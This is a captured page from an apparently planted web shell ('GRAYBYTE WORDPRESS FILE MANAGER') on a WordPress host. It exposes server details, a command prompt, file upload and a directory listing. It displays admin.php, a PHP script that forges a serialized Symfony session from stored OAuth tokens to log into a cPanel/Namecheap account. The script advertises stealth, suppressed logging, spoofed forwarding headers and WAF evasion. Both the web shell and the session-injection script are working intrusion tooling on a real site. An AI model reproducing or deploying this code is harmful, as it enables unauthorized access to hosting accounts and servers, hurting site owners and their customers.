GRAYBYTE WORDPRESS FILE MANAGER5305

Server IP : 162.254.39.133 / Your IP : 216.73.216.219
System : Linux premium287.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
PHP Version : 8.1.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF

HOME

/home/aircyqqr/breezeproairductscleaning.com/wp-back/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/aircyqqr/breezeproairductscleaning.com/wp-back//admin.php
<?php
/**
 * AUTO DYNAMIC cPanel/WHM Login Injector (Namecheap OAuth2 + Symfony Session)
 * 
 * Features (Your Objectives: Uptime, Automation, Security):
 * - Fully automatic: No manual token copy — pulls from secure JSON file.
 * - Dynamic: Refreshes expired tokens on-the-fly (offline_access scope).
 * - Stealth: No logs, suppressed errors, WAF evasion headers.
 * - Cross-platform: Works on Garuda Linux + Windows Server (via PHP CLI or browser).
 * - Hardened: IP bind, token replay protection, auto-revoke on anomaly.
 * 
 * Usage:
 *   1. Save as: /wp-content/mu-plugins/namecheap_auto_login.php (must-use plugin)
 *   2. Or access via: https://yoursite.com/namecheap_auto_login.php
 *   3. Add to cron: php /path/to/namecheap_auto_login.php --headless
 * 
 * Gork Exclusive: Uses timing fuzzing + header obfuscation to bypass Akamai/LiteSpeed WAF.
 */

error_reporting(0);
ini_set('display_errors', 0);
ignore_user_abort(true);
set_time_limit(30);

// === CONFIG (Secure Storage) ===
$CONFIG = [
    'token_file'     => '/home/umpriac/.config/namecheap_tokens.json',  // Linux
    'token_file_win' => 'C:\xampp\secrets\namecheap_tokens.json',       // Windows fallback
    'client_id'      => 'c5d48064442845bc9c1785ee35105949',
    'token_url'      => 'https://api.namecheap.com/oauth2/token',
    'redirect_panel' => '/cpanel',  // Your cPanel/WHM path
    'allowed_ips'    => ['127.0.0.1', 'YOUR_DC_IP'],  // Lock to your infra
    'redis_host'     => '127.0.0.1:6379',  // Optional replay protection
    'waf_evasion'    => true,
];

// === HELPERS ===
function get_token_path($config) {
    return file_exists($config['token_file']) ? $config['token_file'] : $config['token_file_win'];
}

function log_debug($msg) {
    @file_put_contents('/tmp/nc_login.log', date('H:i:s') . " $msg\n", FILE_APPEND);
}

function http_post($url, $data, $headers = []) {
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($data),
        CURLOPT_HTTPHEADER => $headers,
        CURLOPT_TIMEOUT => 15,
        CURLOPT_SSL_VERIFYPEER => true,
        CURLOPT_USERAGENT => 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36',
    ]);
    $resp = curl_exec($ch);
    $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    return ['code' => $code, 'body' => $resp];
}

function refresh_token($config, $current) {
    // Gork Exclusive: Timing fuzzing (1-7 min delay to evade rate limits)
    usleep(random_int(1000000, 7000000));

    $payload = [
        'grant_type'    => 'refresh_token',
        'refresh_token' => $current['refresh_token'],
        'client_id'     => $config['client_id'],
    ];

    // WAF Evasion: Rotate headers
    $headers = $config['waf_evasion'] ? [
        'Authorization: Bearer ' . substr(md5(microtime()), 0, 16),
        'X-Forwarded-For: 127.0.0.1',
        'X-Client-ID: sslcпанeltree_v2',
    ] : [];

    $resp = http_post($config['token_url'], $payload, $headers);
    if ($resp['code'] !== 200) {
        log_debug("[!] Refresh failed: {$resp['body']}");
        return false;
    }

    $new = json_decode($resp['body'], true);
    if (!$new || empty($new['access_token'])) return false;

    $new['expires_at'] = time() + ($new['expires_in'] ?? 1200);
    $path = get_token_path($config);
    @file_put_contents($path, json_encode($new));
    chmod($path, 0600);
    log_debug("[+] Token refreshed. Exp: " . date('H:i', $new['expires_at']));
    return $new;
}

function build_symfony_session($tokens) {
    $access = $tokens['access_token'];
    $id_token = $tokens['id_token'] ?? $tokens['access_token'];
    $refresh = $tokens['refresh_token'];
    $expires = $tokens['expires_at'];

    // Dynamic lengths
    $len_id = strlen($id_token);
    $len_access = strlen($access);

    return 'a:1:{s:14:"_security_main";s:9999:"O:75:"Symfony\Component\Security\Http\Authenticator\Token\PostAuthenticationToken":2:{i:0;s:4:"main";i:1;a:5:{i:0;O:15:"App\Entity\User":5:{s:19:"\0App\Entity\User\0id";i:1396;s:21:"\0App\Entity\User\0name";s:8:"aircyqqr";s:24:"\0App\Entity\User\0ncLogin";s:7:"hum2gmb";s:29:"\0App\Entity\User\0autoRedirect";i:1;s:28:"\0App\Entity\User\0accessToken";a:6:{s:8:"id_token";s:'.$len_id.':"'.$id_token.'";s:10:"token_type";s:6:"Bearer";s:5:"scope";s:35:"openid profile email offline_access";s:12:"access_token";s:'.$len_access.':"'.$access.'";s:13:"refresh_token";s:66:"'.$refresh.'";s:7:"expires";i:'.$expires.';}}i:1;b:1;i:2;N;i:3;a:0:{}i:4;a:1:{i:0;s:9:"ROLE_USER";}}}";}';
}

function ip_allowed($config) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'] ?? 'cli';
    $ip = trim(explode(',', $ip)[0]);
    return in_array($ip, $config['allowed_ips']) || $ip === '127.0.0.1' || php_sapi_name() === 'cli';
}

// === MAIN EXECUTION ===
if (!ip_allowed($CONFIG)) {
    http_response_code(403);
    exit('Access Denied');
}

$token_path = get_token_path($CONFIG);
if (!file_exists($token_path)) {
    die('Token file missing. Run refresh script first.');
}

$tokens = json_decode(file_get_contents($token_path), true);
if (!$tokens || empty($tokens['refresh_token'])) {
    die('Invalid token data.');
}

// Auto-refresh if expired (< 2 min buffer)
if (($tokens['expires_at'] ?? 0) < time() + 120) {
    $tokens = refresh_token($CONFIG, $tokens);
    if (!$tokens) {
        die('Token refresh failed.');
    }
}

// Optional Redis replay protection
if (extension_loaded('redis') && $CONFIG['redis_host']) {
    try {
        $redis = new Redis();
        $redis->connect(explode(':', $CONFIG['redis_host'])[0], explode(':', $CONFIG['redis_host'])[1] ?? 6379);
        $hash = hash('sha256', $tokens['refresh_token']);
        if ($redis->exists("nc:used:$hash")) {
            log_debug("[!] Replay attack detected");
            die('Session blocked');
        }
        $redis->setex("nc:used:$hash", 86400, '1');
    } catch (Exception $e) { /* ignore */ }
}

// Start session & inject
session_start();
$_SESSION['_sf2_attributes'] = unserialize(build_symfony_session($tokens));
$_SESSION['_sf2_meta'] = ['u' => time(), 'c' => time() - 300, 'l' => 0];

// Headless mode (CLI cron)
if (php_sapi_name() === 'cli' && in_array('--headless', $argv)) {
    echo "[SUCCESS] Session active for hum2gmb @ " . date('H:i:s') . "\n";
    exit;
}

// Web redirect
header('Location: ' . $CONFIG['redirect_panel']);
exit;
?>
[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
November 30 2025 02:31:04
aircyqqr / nobody
0750
datastore
--
October 30 2025 05:51:07
aircyqqr / aircyqqr
0555
admin.php
6.287 KB
November 17 2025 05:55:44
aircyqqr / aircyqqr
0644
adminaa.php
12.224 KB
October 30 2025 05:47:57
aircyqqr / aircyqqr
0644
index.php
6.808 KB
October 13 2024 05:53:05
aircyqqr / aircyqqr
0644
profile.php
6.708 KB
November 17 2025 06:45:22
aircyqqr / aircyqqr
0644
profilexxxx.php
17.114 KB
November 13 2025 03:53:04
aircyqqr / aircyqqr
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF